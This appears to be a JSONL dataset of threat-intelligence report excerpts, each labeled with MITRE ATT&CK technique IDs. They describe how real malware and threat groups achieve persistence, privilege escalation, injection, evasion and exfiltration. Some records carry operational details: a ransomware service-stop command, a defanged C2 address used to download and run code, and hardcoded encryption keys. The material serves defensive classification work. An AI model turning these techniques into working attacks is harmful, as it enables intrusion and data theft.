{"text1":"A tool used by the adversary which wasn\u2019t installed on the servers by default, was DSInternals. DSInternals is a PowerShell module that makes use of internal Active Directory features. The files and directories found on various systems of a victim match with DSInternals version 2.16.1. We have found traces that indicate DSInternals was executed and at which time, which match with the rest of the traces of the intrusion. We haven\u2019t recovered traces of how the adversary used DSInternals, but considering the phase of the intrusion the adversary used the tool, it is likely they used it for either account discovery or privilege escalation, or both","labels":"['T1059.001']"}
{"text1":"From the attacks observed by Volexity, what is most notable is that Patchwork has pivoted its targeting and has launched attacks directly against US-based think tanks. Volexity has also found that, in addition to sending malware lures, the Patchwork threat actors are leveraging unique tracking links in their e-mails for the purpose of identifying which recipients opened their e-mail messages. This domain was not only used to send the phishing e-mails, but also to track which targets opened the e-mail. Within each of the HTML-formatted messages, an embedded image tag is used to beacon home to the attacker's domain, containing a unique identifier specific to the recipient. While the use of e-mail recipient tracking, a linked RTF document, and a final payload (QuasarRAT variant) remained the same, certain elements differed across campaigns observed. Exploitation and Malware Execution . Upon opening the above attachments, the recipient will be presented with a document that is a direct copy of a blog post or report released by the think tank organization being impersonated. It's called the \"packager trick\" because any file embedded in an RTF file using packager will be automatically dropped to the %tmp% folder (c:\\Users\\%username%\\AppData\\Local\\Temp) when the RTF document is opened. Second, the threat actors exploit CVE-2017-8570 to achieve code execution via a malicious \"scriptlet\" file, or .sct file, which is also embedded in the malicious RTF document. The Patchwork threat actors also appear to have adopted a technique seen from other APT groups where they are now tracking the effectiveness of their campaigns by recording which recipients have opened the phishing message","labels":"['T1566.002']"}
{"text1":"The malware launches another thread that scans for new drives attached to the system every three seconds. If a new drive is attached to the system and is not identified as a type CDROM drive, the malware begins the encryption process on the new drive. On new drives attached to the system, the malware may create the directory <Drive_letter>:\\$RECYCLE and execute the following command","labels":"['T1120']"}
{"text1":"Shamoon enables the service RemoteRegistry, which allows a program to remotely modify the registry. It also disables remote user account control by enabling the registry key LocalAccountTokenFilterPolicy","labels":"['T1112']"}
{"text1":"SUNSPOT appends an entry in the log file with the date and time of the backdoor attempt and waits for the MsBuild.exe process to exit before restoring the original source code and deleting the temporary InventoryManager.bk file. If the Orion solution build is successful, it is backdoored with SUNBURST","labels":"['T1070.004']"}
{"text1":"TA505 uses fast flux, a DNS technique used to mask botnets by quickly shifting among compromised hosts, which allows cybercriminals to delay or evade detection. The domains the group has been using to distribute payloads were usually resolved across a lot of IPs","labels":"['T1568.001']"}
{"text1":"In at least one instance of EnvyScout delivery, we observed further enumeration of the executing browser\u2019s environment, wherein the user-agent was used to determine whether a Windows machine received an ISO payload. If the visitor arrived via iOS, they were redirected to external infrastructure","labels":"['T1082']"}
{"text1":"Based on our technical analysis, telemetry, and data from submissions, we can assert with high confidence that this is the work of the Hidden Cobra group. These initial findings appear to be the first stage of Operation GhostSecret. For more on the global aspect of this threat, see \u201cGlobal Malware Campaign Pilfers Data from Critical Infrastructure of Entertainment, Finance, Health Care, and Other Industries","labels":"['T1573.001']"}
{"text1":"Enumerate all CLRs loaded in the AD FS process Microsoft.IdentityServer.ServiceHost.exe - For each CLR, enumerate all running application domains and perform the following actions for each domain: - Read the contents of the following encrypted FoggyWeb backdoor file into memory: C:\\Windows\\SystemResources\\Windows.Data.TimeZones\\pris\\Windows.Data.TimeZones.zh-PH.pri - Decrypt the encrypted FoggyWeb backdoor file using the Lightweight Encryption Algorithm (LEA). The LEA-128 key schedule uses the following hardcoded master key to generate the round keys","labels":"['T1140']"}
{"text1":"Interestingly, the ChChes samples we observed were digitally signed using a certificate originally used by HackingTeam and later part of the data leaked when they were themselves hacked. Wapack labs also observed a similar sample targeting Japan in November. It\u2019s not clear why the attackers chose to use this certificate, as it was old, had been leaked online, and had already been revoked by the time they used it. Digital certificates are typically used because they afford an air of legitimacy, which this one definitely does not","labels":"['T1553.002']"}
{"text1":"That persistence is achieved by adding a new task in the task scheduler \u2013 it deploys the malicious sample after every minute, to ensure that it keeps running","labels":"['T1053.005']"}
{"text1":"To further confuse anti-malware solutions, the loader contains the entire unobfuscated code of a legitimate open source application called Blink (https:\/\/github.com\/crosire\/blink), which never gets executed","labels":"['T1027.001']"}
{"text1":"The Calisto installation file is an unsigned DMG image under the guise of Intego\u2019s security solution for Mac","labels":"['T1036.005']"}
{"text1":"The software installed on the compromised computer is of particular interest. Which programs are installed on the system. Which of them are executed automatically at each system start or user logon. Which programs are used by a particular user. If the attackers are interested, they are only one command away from these valuable data","labels":"['T1518']"}
{"text1":"The service-based DLL implant traverses to the \/htdocs\/ directory on the FTP server and looks for any files with the keywords","labels":"['T1083']"}
{"text1":"Finally, Grandoreiro detects two virtual environments \u2013 VMWare via its special I\/O port and Virtual PC via the vpcext instruction","labels":"['T1497.001']"}
{"text1":"The attacker\u2019s choice of IP addresses was also optimized to evade detection. The attacker primarily used only IP addresses originating from the same country as the victim, leveraging Virtual Private Servers","labels":"['T1036']"}
{"text1":"SUNSPOT is StellarParticle\u2019s malware used to insert the SUNBURST backdoor into software builds of the SolarWinds Orion IT management product. SUNSPOT monitors running processes for those involved in compilation of the Orion product and replaces one of the source files to include the SUNBURST backdoor code. Several safeguards were added to SUNSPOT to avoid the Orion builds from failing, potentially alerting developers to the adversary\u2019s presence","labels":"['T1195.002']"}
{"text1":"When the newer service variant of BitPaymer is run, it first determines if it is being executed from an alternate data stream. If it is not executed from an alternate data stream, the malware creates a file in the %APPDATA% folder with a random file name between three and eight characters long, containing uppercase and lowercase letters as well as numbers. It then copies itself to the alternate data stream :bin of the newly created file and creates a new process from the stream","labels":"['T1564.004']"}
{"text1":"Flame appears to have two modules designed for infecting USB sticks, called \u201cAutorun Infector\u201d and \u201cEuphoria\u201d. We haven\u2019t seen them in action yet, maybe due to the fact that Flame appears to be disabled in the configuration data. Nevertheless, the ability to infect USB sticks exists in the code, and it\u2019s using two methods","labels":"['T1091']"}
{"text1":"The modules are signed with invalid digital certificates listed as \u201cTencent Technology (Shenzhen) Company Limited\u201d with serial numbers copied from real Tencent certificates","labels":"['T1036.001']"}
{"text1":"Capable of stealing documents sent to the printer queue. Steals written CD images. Capable of stealing files previously seen on removable drives once they are available again. Steals Internet Explorer, Netscape Navigator, FireFox and RealNetworks cookies. If deleted from Frontend file or related registry values, it will reappear after reboot with a new name and startup type","labels":"['T1025']"}
{"text1":"Recall that when the malicious code is executed, it invokes the extract_ei function on its own binary image, to check if the file is infected. If so, it opens itself, and reads the trailer to get the offset of where the file\u2019s original bytes are located. It then writes these bytes out to a new file named: .<orginalfilename>1. This file is then set executable (via chmod) and executed (via execl","labels":"['T1554']"}
{"text1":"Next, the shellcode iterates through the PEB\u2019s loader module list looking for the base address of Kernel32.dll. This is typical of shellcode, as the Kernel32.dll base address is necessary to resolve any dependency files required by the shellcode to run. With this address, the shellcode loads its dependency modules and resolves any necessary Windows Application Programming Interface (API) calls using standard shellcode API hashing. The following modules are loaded","labels":"['T1106']"}
{"text1":"Receive a file path from the C2 for a file to read. The target file is read and then split into smaller files named \"<target_filename>.part_<part_number>\" and stored on disk. This capability can be used to break large files of interest into smaller chunks to prepare them for exfiltration","labels":"['T1030']"}
{"text1":"This introduction of string obfuscation also suggests a development change aimed at evading detection. The header codes, filename references, and all of the operator commands were obfuscated and only decoded during execution of the KeyBoy DLL. Figure 6 shows a sampling of these strings, after decoding","labels":"['T1027']"}
{"text1":"The developer implemented a total of seven techniques to identify if the compromised system is a virtual machine. Additionally, the malware checks the SerialNumber and the version of the BIOS. The third technique uses the Win32_Computer entry in WMI. It checks if the manufacturer contains \"VIRTUAL\", \"VMWARE\" or \"VirtualBox\". The fourth technique checks the Processor ID of the system. The WMI request simply replies \"not supported\". This behaviour can be used to detect if the targeted system is a real machine. The last technique uses the MAC Address of the infected system. If the MAC Address starts by a well-known hexadecimal number, the system is identified as a virtual machine. The variant version of GX is used in the URI","labels":"['T1497.001']"}
{"text1":"COBALT DICKENS uses publicly available tools, including the SingleFile plugin available on GitHub and the free HTTrack Website Copier standalone application, to copy the login pages of targeted university resources. Metadata in a spoofed login page created on August 1 suggests that COBALT DICKENS sometimes uses older copied versions of target websites. A comment left in the source code indicates it was originally copied on May 1, 2017 (see Figure 3). However, the university was targeted by numerous COBALT DICKENS operations, including the August 2018 and August 2019 campaigns","labels":"['T1588.002']"}
{"text1":"NOBELIUM, with existing administrative permissions, was observed to drop a malicious loader named version.dll in the %WinDir%\\ADFS\\ folder where the AD FS service executable Microsoft.IdentityServer.ServiceHost.exe is located. Once the system or the AD FS service is restarted, Microsoft.IdentityServer.ServiceHost.exe loads mscoree.dll, which in turn loads mscoreei.dll. As mentioned above, mscoreei.dll has a delay load import named version.dll","labels":"['T1574.001']"}
{"text1":"In recent BitPaymer IR engagements, Falcon Intelligence linked the initial infection vector to fake updates for a FlashPlayer plugin and the Chrome web browser. These fake updates are served via legitimate websites that have been compromised, and use social engineering to trick users into downloading and running a malicious executable. These fake update campaigns appear to be a pay-per-install service that is simply used by INDRIK SPIDER to deliver its malware, as other malware has also been delivered via the same campaigns","labels":"['T1036.005', 'T1584.004']"}
{"text1":"One of the reconnaissance commands was to run a modified nbtscan tool (\"NetBIOS nameserver scanner\") to identify available NetBIOS name servers locally or over the network. Nbtscan has been used by APT10 in Operation Cloud Hopper to search for services of interest across the IT estate and footprint endpoints of interest. It is also capable of identifying system information","labels":"['T1016', 'T1018']"}
{"text1":"The attacker used a temporary file replacement technique to remotely execute utilities: they replaced a legitimate utility with theirs, executed their payload, and then restored the legitimate original file. They similarly manipulated scheduled tasks by updating an existing legitimate task to execute their tools and then returning the scheduled task to its original configuration. They routinely removed their tools, including removing backdoors once legitimate remote access was achieved","labels":"['T1070.004', 'T1070', 'T1053.005']"}
{"text1":"Modifying the Standard Information timestamps (created, modified, accessed) of every downloaded executable to match a randomly selected file from the System32 directory that was created prior to 2013","labels":"['T1070.006']"}
{"text1":"1) Suckfly's first step was to identify a user to target so the attackers could attempt their initial breach into the e-commerce company's internal network. 2) On April 22, 2015, Suckfly exploited a vulnerability on the targeted employee's operating system (Windows) that allowed the attackers to bypass the User Account Control and install the Nidiran back door to provide access for their attack. 3) After the attackers successfully exploited the employee\u2019s system, they gained access to the e-commerce company's internal network. To do this the attackers used a signed credential-dumping tool to obtain the victim's account credentials. With the account credentials, the attackers were able to access the victim's account and navigate the internal corporate network as though they were the employee. 4) On April 27, the attackers scanned the corporate internal network for hosts with ports 8080, 5900, and 40 open. Ports 8080 and 5900 are common ports used with legitimate protocols, but can be abused by attackers when they are not secured. Based on Suckfly scanning for common ports, it\u2019s clear that the group was looking to expand its foothold on the e-commerce company's internal network. 5) The attackers\u2019 final step was to exfiltrate data off the victim\u2019s network and onto Suckfly\u2019s infrastructure. While we know that the attackers used the Nidiran back door to steal information about the compromised organization, we do not know if Suckfly was successful in stealing other information","labels":"['T1078']"}
{"text1":"After these strings are decrypted, the malware will load a series of Microsoft Windows API calls to be used later on. After these functions are loaded, Comnie determines if it is running within the %TEMP% directory of the victim machine. In the event it is not running within this directory, it will copy itself to %TEMP% and execute this newly created file with an argument of the original file\u2019s path. A total of 64MB of garbage data is appended to this copied file, likely as a way to deter any security products in place that may be scanning files on disk. After running within the %TEMP% path, Comnie will delete the original file. After Comnie has been copied to the %TEMP% directory, it will look for the presence of the \u2018DQuit.tmp\u2019 file in this path. It is unclear how this file is used exactly, as it does not appear to ever be written during runtime by Comnie. Comnie then continues to enter its installation routine. In doing so, it will attempt to detect the following Anti-Virus products via various techniques","labels":"['T1027.001']"}
{"text1":"This list of strings differs from previously analyzed SofacyCarberp samples, such as the variant discussed in our June 2016 blog \u201cNew Sofacy Attacks Against US Government Agency\u201c that chose from a list of strings .xml, .pdf, .htm or .zip. After establishing that the system has Internet access, the Trojan will gather detailed system information and send it to the C2 server","labels":"['T1082']"}
{"text1":"In April, security researchers in the Microsoft Threat Intelligence Center discovered infrastructure of\u00a0a known adversary communicating to several external devices. Further research uncovered attempts by the actor to compromise popular IoT devices (a VOIP phone, an office printer, and a video decoder) across multiple customer locations. The investigation uncovered that an actor had used these devices to gain initial access to corporate networks. In two of the cases, the passwords for the devices were deployed without changing the default manufacturer\u2019s passwords and in the third instance the latest security update had not been applied to the device","labels":"['T1078']"}
{"text1":"When exploiting the intended targets, the threat actors used malicious .docx files to capture user credentials. The documents retrieved a file through a \u201cfile:\/\/\u201d connection over SMB using Transmission Control Protocol (TCP) ports 445 or 139. When a user attempted to authenticate to the domain, the C2 server was provided with the hash of the password. Local users received a graphical user interface (GUI) prompt to enter a username and password, and the C2 received this information over TCP ports 445 or 139. Note: a file transfer is not necessary for a loss of credential information. Symantec\u2019s report associates this behavior to the Dragonfly threat actors in this campaign","labels":"['T1187']"}
{"text1":"Otherwise, the malware bypasses UAC and escalates privileges with two different approaches \u2013 one for Windows 10 and the other for older versions","labels":"['T1548.002']"}
{"text1":"The logging functions are hooked so that whenever the backdoor is used, nothing gets sent to the logging facility, leaving no trace of the backdoor in the log files on disk. If the backdoor is not in use, logging will behave normally and function calls will get redirected to the original function implementation","labels":"['T1562.006']"}
{"text1":"The second part of API hooking hooks \u201cGetExtendedTcpTable\u201d. GetExtendedTcpTable is used for retrieving a table that contains a list of TCP endpoints available to the application, and it is frequently used in some network-related commands, such as netstat. The purpose of the hook is to remove TCP endpoint records of certain PIDs. The second function, \u201cGetRTTAndHopCount,\u201d acts as the place to put the injected hooking code","labels":"['T1049']"}
{"text1":"The output of the downloaded batch file is saved to \u201c%PUBLIC%\\Libraries\\tp\\<batch filename>.txt\u201d. The script will then upload the output of this batch file by including the data in a sequence of DNS queries. The script exfiltrates the output of the batch script by splitting up the data within the text file into chunks of up to 23 bytes and sends the data within a series of DNS queries that have the following structure","labels":"['T1030']"}
{"text1":"Installs UnionCryptoTrader in folder \/Applications\/UnionCryptoTrader.app\/Contents\/MacOS\/ - Installs .unioncryptoupdater in folder \/Applications\/UnionCryptoTrader.app\/Contents\/Resources\/ - Note: the leading \u201c.\u201d makes it unlisted in the Finder app or default Terminal directory listing - Executes a postinstall script - Moves .vip.unioncrypto.plist to folder LaunchDaemons - Changes the file permissions on the plist to Root - Runs unioncryptoupdater - Moves .unioncryptoupdater to folder \/Library\/UnionCrypto\/unioncryptoupdater - Makes .unioncryptoupdater executable","labels":"['T1564.001']"}
{"text1":"It uses GetLogicalDrives to get a bitmask of all the drives available on the system, then iterates over each possible drive letter","labels":"['T1082']"}
{"text1":"Ryuk does not encrypt files from within its own process memory space, but injects into a remote process. Before injecting into a remote process, Ryuk attempts to adjust its token privileges to have the SeDebugPrivilege. Before injecting into a remote process, Ryuk also calls CreateToolhelp32Snapshot to enumerate all running processes. If a process is found that is not named csrss.exe, explorer.exe, lsaas.exe, or is running under NT AUTHORITY system account, Ryuk will inject itself into this single process. By ensuring that the process is not running under NT AUTHORITY, the developers are assuming the process is not running under another account and therefore can be written to. Ryuk uses a combination of VirtualAlloc, WriteProcessMemory and CreateRemoteThread to inject itself into the remote process","labels":"['T1055']"}
{"text1":"Next, the third-stage DLL will load the \"Waqybg\" resource into memory. As the resource is stored in reverse byte order, the third-stage DLL will restore it by reversing the bytes and then proceed to decompress it. The decompressed data is the fourth stage wiper payload. After decompressing the data, the third-stage DLL copies a legitimate Windows utility \"InstallUtil.exe\" into the %TEMP% directory, creates a suspended process with it and injects the fourth-stage wiper into the process. Finally, it resumes the process and transfers the execution flow to the fourth-stage wiper. Creates InstallUtil.exe process","labels":"['T1055']"}
{"text1":"Whitefly has consistently used a technique known as search order hijacking to run Vcrodat. This technique takes advantage of the fact that Windows does not require an application to provide a specific path for a DLL that it wishes to load. If no path is provided, Windows searches for the DLL in specific locations on the computer in a pre-defined order. Attackers can therefore give a malicious DLL the same name as a legitimate DLL but place it ahead of the legitimate version in the search order so that it will be loaded when Windows searches for it. Whitefly frequently delivers Vcrodat as a malicious DLL that has the same name as DLLs belonging to legitimate software from various security vendors. The group leverages search order hijacking to assure that its malicious DLLs will be executed. Targeting security applications could allow the attackers to gain higher privileges for the malware, since the vendor\u2019s component may be run with elevated privileges","labels":"['T1036.005']"}
|
|
{"text1":"The malware\u2019s next action is to check if the execute privilege is SYSTEM. When the execute privilege is SYSTEM, the malware will get the process \u201cExplorer.exe\u201d, get the token of the user that launched the process and impersonate it. It is a downgrade from SYSTEM to another user with less privileges to avoid affecting the desktop of the SYSTEM user later","labels":"['T1134.001']"}
|
|
{"text1":"The threat actors commonly created web shells on the intended targets\u2019 publicly accessible email and web servers. The threat actors used three different filenames (\u201cglobal.aspx, autodiscover.aspx and index.aspx) for two different webshells","labels":"['T1505.003']"}
|
|
{"text1":"Currently LockerGoga does not support any worm-like capabilities that would allow it to self-propagate by infecting additional hosts on a target network. We have observed LockerGoga moving around a network via the server message block (SMB) protocol, which indicates the actors simply manually copy files from computer to computer","labels":"['T1570']"}
|
|
{"text1":"Finally, command line tried to execute (iex is an alias for Invoke-Expression) the code downloaded from the IP address 104[.]168[.]237[.]21. Threat actors abused sslip.io for connection to C&C - a service that provides free IP to domain mapping to make SSL certificate generation easier for traffic encryption. While this service is legitimate and widely used, the malware abused it in an attempt at evading detection when connecting to C&C servers","labels":"['T1102']"}
|
|
{"text1":"If the payload determines it is not running in a sandbox, it will attempt to install itself to the system to persistently execute","labels":"['T1547.009']"}
|
|
{"text1":"With the file written to the system, the Trojan calls the \"GetishideAbById\" SOAP action to determine whether or not the C2 server wishes to execute the newly dropped file in a hidden window. This request is followed by a call to \"GetisrunasAbById\" to determine if the Trojan should use \"runas\" to execute the downloaded executable with elevated privileges, which would display the UAC dialog for the user to click","labels":"['T1564.003']"}
|
|
{"text1":"Numbered Panda has a long list of high-profile victims and is known by a number of names including: DYNCALC, IXESHE, JOY RAT, APT-12, etc. Numbered Panda has targeted a variety of victims including but not limited to media outlets, high-tech companies, and multiple governments. Numbered Panda has targeted organizations in time-sensitive operations such as the Fukushima Reactor Incident of 2011, likely filling intelligence gaps in the ground cleanup\/mitigation operations. One of the most interesting techniques that Numbered Panda likes to use is to dynamically calculate the Command and Control (C2) port by resolving a DNS. The malware will typically use two DNS names for communication: one is used for command and control; the other is used with an algorithm to calculate the port to communicate to. There are several variations of the algorithm used to calculate the C2 port, but one of the most common is to multiply the first two octets of the IP address and add the third octet to that value. This is typically represented as: (A * B) + C \u2013 common values might be 200.2.43.X, which would result in communication on port 443. Numbered Panda will frequently use blogs or WordPress in the c2 infrastructure, which helps to make the network traffic look more legitimate. CrowdStrike has observed Numbered Panda targeting high-tech, defense contractors, media organizations, and western governments","labels":"['T1568.003']"}
|
|
{"text1":"Appending a file signature header to all encrypted data, prior to upload or download, by randomly selecting from the file types","labels":"['T1027']"}
|
|
{"text1":"Figure 5 shows the splash image displayed by the Enigma protector prior to executing the malicious payload, which is a wallpaper image available at wallpaperswide.com. The splash screen feature acts as a sandbox evasion technique, as it requires user interaction in the form of clicking the screen before the malicious code runs","labels":"['T1497.002']"}
|
|
{"text1":"Conti uses a multithreading technique to fast encrypt all the files. This routine takes seconds to just a few minutes depending on the number of files on the machine. Each sample has a unique extension that the malware adds to the encrypted files. While using Cybereason with prevention mode off to allow investigation of the ransomware execution, it is possible to see the encryption activity and the creation of new files","labels":"['T1486']"}
|
|
{"text1":"Besides fetching a list of scanning targets, Xbash will also request the C2 server via URI \u201c\/p\u201d to fetch a list of weak passwords for brute forcing","labels":"['T1110.001']"}
|
|
{"text1":"Some versions of the Orz backdoor have 32- and 64-bit embedded DLLs, stored internally as base64 strings. Their purpose is to simply run another binary. These are used as loaders for future executable payloads, using the well-known process hollowing technique. To use the MockDll, the backdoor creates a configuration .ini file like that shown in Figure 14","labels":"['T1055.012', 'T1218.010']"}
|
|
{"text1":"The shellcode loader was observed on one infected device as updater.exe with the Metasploit-style service name APTYnDS1ABEuUHEA, indicating that it was installed as a service","labels":"['T1553.002']"}
|
|
{"text1":"From one of the hosts, we discovered that the actor executed a credential harvesting tool named Responder and moved laterally using Windows commands. Lazarus overcame network segmentation, exfiltrating data from a completely isolated network segment cut off from the internet by compromising a router virtual machine, as we explain below under \u201cOvercoming network segmentation","labels":"['T1557.001']"}
|
|
{"text1":"1) If the malware was executed with the \"install\" command-line argument, which uses .NET Framework\u2019s InstallHelper method to install the malware as a service. 3) If no arguments are provided and the malware determines it is running in a Windows environment, it saves a DLL to the system that it injects into the explorer.exe process. The injected DLL executable loads the malware\u2019s executable and runs it within memory of the explorer.exe process","labels":"['T1055.001']"}
|
|
{"text1":"This static set of characteristics, combined with the minimal use of obfuscation in their phishing attacks, may benefit organizations that are potential targets for IRON TILDEN","labels":"['T1221']"}
|
|
{"text1":"Browser credential stealing: Capability to steal credentials (username and password) from the installed browsers, Microsoft Internet Explorer (MSIE), and Google\u00a0Chrome browser. Figures 7\u00a0and 8 show the code sections responsible for stealing the credentials from MSIE and Chrome browser respectively","labels":"['T1555.003']"}
|
|
{"text1":"The malware then grants itself debugging privileges by modifying its security token to add SeDebugPrivilege. This step is a prerequisite for the remainder of SUNSPOT\u2019s execution, which involves reading other processes\u2019 memory","labels":"['T1134']"}
|
|
{"text1":"Interestingly, there is an option in the RC2CL module to turn off its backdoor functionality and act as a proxy. In this case, the malware turns off the Windows firewall and creates a server that relays communication between a client and C&C server, or between two clients","labels":"['T1090.001']"}
|
|
{"text1":"The legitimate application is a digitally signed sample of Kaspersky Anti-Virus (AV) 6.0 for Windows Workstations. When the Kaspersky application is run, it loads a file named msi.dll, which is located within the same directory. The XOR-decode process, which skips zeroes, uses the single-byte key 0x88","labels":"['T1574.002']"}
|
|
{"text1":"In this attack, spear phishing was used as the initial infection vector. Before launching the attack, the group studied publicly available information about the targeted organization and identified email addresses belonging to various departments of the company","labels":"['T1589.002']"}
|
|
{"text1":"In order to avoid raising suspicions from the victim, CSPY Downloader exploits a known UAC bypass technique that uses the SilentCleanup task to execute the binary with elevated privileges","labels":"['T1548.002']"}
|
|
{"text1":"If the ransomware is not executed with administrator rights or if the infected host runs Windows Vista or later, it will attempt to elevate its privileges. In short, WastedLocker uses a well-documented UAC bypass method [1] [2]. It chooses a random file (EXE\/DLL) from the Windows system32 folder and copies it to the %APPDATA% location under a different hidden filename. Next, it creates an alternate data stream (ADS) into the file named bin and copies the ransomware into it. WastedLocker then copies winsat.exe and winmm.dll into a newly created folder located in the Windows temporary folder","labels":"['T1564.001']"}
|
|
{"text1":"A service that ensures Carbon\u2019s persistency is created. Its name can either be \u201csrservice\u201d, \u201cipvpn\u201d or \u201chkmsvc\u201d depending on the operating system version running on the compromised machine","labels":"['T1543.003']"}
|
|
{"text1":"After having registered the Print Processor, PipeMon restarts the print spooler service (spoolsv.exe). As a result, the malicious print process is loaded when the spooler service starts. Note that the Print Spooler service starts at each PC startup, which ensures persistence across system resets","labels":"['T1543.003']"}
|
|
{"text1":"After patching, the threat actor can use the Skeleton Key password configured at the time of deployment to log in as any domain user. Legitimate users can still log in using their own passwords","labels":"['T1556.001']"}
|
|
{"text1":"Create a Safe Array and copy the decrypted FoggyWeb backdoor bytes to the array. It then calls the Load() function for the current application domain to load the FoggyWeb DLL into the application domain. After the FoggyWeb DLL is loaded into the current application domain, the loader invokes the following method from the DLL: Microsoft.IdentityServer.WebExtension.WebHost","labels":"['T1129']"}
|
|
{"text1":"In the first path, obtaining the SAML signing certificate normally entails first querying the private encryption key that resides on the AD FS container and then using that key to decrypt the signing certificate. The certificate can then be used to create illicit but valid SAML tokens that allow the actor to impersonate users, enabling them to access enterprise cloud applications and services","labels":"['T1552.004', 'T1550']"}
|
|
{"text1":"The websites contain numerous articles and content to make them seem legitimate; in some cases the websites have over 10,000 individual news articles. Volexity has found the content is largely scraped and reposted in full from various other legitimate online news outlets. This appears to be done in an automated fashion and most likely through WordPress plugins. Numerous posted articles and images can be directly tracked back to other online blogs and newspapers; sometimes the byline or even watermark in images show directly where the article was sourced. In some cases, only a small number of pages on the site contains malicious code; in other cases, the profiling code is pervasive","labels":"['T1608.004']"}
|
|
{"text1":"Checking for specific keyboards and languages is a known evasion tactic meant to avoid running on analysis systems not configured, as the actor\u2019s targeted victim would be configured","labels":"['T1614.001']"}
|
|
{"text1":"MSTIC has observed NICKEL drop their malware into existing installed software paths. They did this to make their malware appear to be files used for an installed application. The following are example paths","labels":"['T1036.005']"}
|
|
{"text1":"If the bot is running with a regular user privilege, persistence is established using the registry \u201cRun\u201d method. The loader DLL component is written to \u201c%APPDATA%\\mswinload[.]dll\u201d and a \u201cmswinload\u201d value is added to the \u201cRun\u201d key to execute ordinal #1 of the DLL with rundll32[.]exe","labels":"['T1547.001']"}
|
|
{"text1":"In order to deploy an implant for the final payload, ScarCruft uses a multi-stage binary infection scheme. As a rule, the initial dropper is created by the infection procedure. One of the most notable functions of the initial dropper is to bypass Windows UAC (User Account Control) in order to execute the next payload with higher privileges. Afterwards, the installer malware creates a downloader and a configuration file from its resource and executes it. The downloader malware uses the configuration file and connects to the C2 server to fetch the next payload. In order to evade network level detection, the downloader uses steganography. The downloaded payload is an image file, but it contains an appended malicious payload to be decrypted","labels":"['T1548.002']"}
|
|
{"text1":"Bisonal main module The DLL (pvcu.dll) is Bisonal malware but using a different cipher for C2 communication than other publicly documented samples. Booz Allen Hamilton in 2014 and AhnLab in 2015 reported on Bisonal using a simple XOR cipher to hide the C2 address strings in the body. The Bisonal sample we observed in this case employs the RC4 cipher with the key \u201c78563412\u201d. To date, all Bisonal samples we have seen using RC4 use this same key. The oldest sample we have dates to 2014, so this variant has been in the wild for several years. Adding to the change in encryption type, a large part of the code such as network communication procedures, and the persistence method have been re-written. For example, the Bisonal malware in 2012 used send() and recv() APIs to communicate with its C2","labels":"['T1573.001']"}
|
|
{"text1":"At the end of the encryption process, Pay2Key will also terminate the MS SQL service using the following command net stop mssqlserver > nul in order to release the files locked by the service","labels":"['T1489']"}
|
|
{"text1":"As a previous write-up on H1N1 by Arbor Networks describes, the LINK command in this instance results in H1N1 downloading and executing a file from a remotely hosted URL using WinINet HTTP requests. The loader also has the functionality of downloading and executing a base64 encoded file contained in the response from the command and control server via the FILE command","labels":"['T1105']"}
|
|
{"text1":"PLEAD also uses CVE-2017-7269, a buffer overflow vulnerability in Microsoft Internet Information Services (IIS) 6.0, to compromise the victim\u2019s server. This is another way for them to establish a new C&C or HTTP server","labels":"['T1190']"}
|
|
{"text1":"The Trojan does not encrypt the data sent via DNS beacons, rather it converts the ASCII characters into their hexadecimal values and includes these values in cleartext. The DNS beacons sent from the Helminth executable have the following structure, which is very similar to the script version","labels":"['T1132.001']"}
|
|
{"text1":"In addition, the threat actors created a scheduled task named reset, which was designed to automatically log out of their newly created account every eight hours","labels":"['T1053.005']"}
|
|
{"text1":"Wrote indicators based on observed attacker activity \u2022 Identified lateral movement, unique backdoors, credential theft, data theft, recon, persistence creation, etc","labels":"['T1053.005']"}
|
|
{"text1":"The Conti Ransomware uses AES-256 encryption via a hard-coded public key. The unique factor is the use of multiple threads for the encryption process, which allows faster encryption as compared to other ransomware. The ransomware uses a CreateIoCompletionPort() call to create 32 thread instances which work simultaneously to encrypt files. After encryption, the ransomware adds an extension to all the encrypted files. It can be seen in the image below","labels":"['T1486']"}
|
|
{"text1":"Over a few days' span, the threat actors install remote access tools on additional systems based upon the results of the network reconnaissance. They use At.exe to schedule tasks to run self-extracting RAR archives, which install either HttpBrowser or PlugX. CTU researchers observed the threat actors collecting Cisco VPN profiles to use when accessing the victim's network via VPN (see Figure 13","labels":"['T1053.002', 'T1133']"}
|
|
{"text1":"The organizational backup server was among the first targeted. When Ryuk was detected and stopped on the backup server, the attackers used the icacls command to modify access control, giving them full control of all the system folders on the server","labels":"['T1222.001']"}
|
|
{"text1":"This thread searches for files with the following extensions on fixed drives and sends them to C2 every 60 minutes","labels":"['T1020']"}
|
|
{"text1":"The delivery document uses the XLSX extension typically used by OpenXML documents, but the file itself is actually an OLE (XLS) document. The file extension to file type discrepancy was caused by the actor using Excel's built-in encryption capability, which stores XLSX ciphertext and the information needed for decryption in an OLE document","labels":"['T1221']"}
|
|
{"text1":"We identified new MSIL components deployed by Zebrocy. While recent Zebrocy versioning was 7.1, some of the related Zebrocy modules that drop file-stealing MSIL modules we call Covfacy were v7.0. For example, one sent out to a handful of countries identifies network drives when they are added to target systems, and then RC4-like-encrypts and writes certain file metadata and contents to a local path for later exfiltration. The stealer searches for files of 60 MB and less with these extensions","labels":"['T1083']"}
|
|
{"text1":"Earlier versions of UPPERCUT used the hard-coded string \u201cthis is the encrypt key\u201d for Blowfish encryption when communicating with a C2. However, in the latest version, the keys are hard-coded uniquely for each C2 address and use the C2\u2019s calculated MD5 hash to determine which key to use, as shown in Figure 10","labels":"['T1573.001']"}
|
|
{"text1":"With this approach, the luring message shown in the Figure 2 now serves another purpose. Not only does it lure the victim into enabling the macros, but it also is assigned an alternate text: \u201cfkwarning\u201d, as seen in Figure 5. The macro has code to check this attribute to make sure the luring message shape object is present. If this object is not found, the macro will exit without downloading additional payloads","labels":"['T1497']"}
|
|
{"text1":"That new instance of RegAsm.exe is then responsible for handling the brunt of the malicious activity (data harvesting, exfiltration). We can also see frequent use of \u2018Process Hollowing\u2019 as an injection method. Process Hollowing allows for the creation or manipulation of processes through which sections of memory are unmapped (hollowed) with that space then being reallocated with the desired malicious code","labels":"['T1055.012']"}
|
|
{"text1":"To deploy the file injector, the instrumentor downloads additional payloads to be injected into a benign process","labels":"['T1055.012']"}
|
|
{"text1":"The program copies itself as <Hangul full path>HncReporter.exe and changes the default program association in the registry to open HWP documents. To do so, it alters following registry values","labels":"['T1546.001']"}
|
|
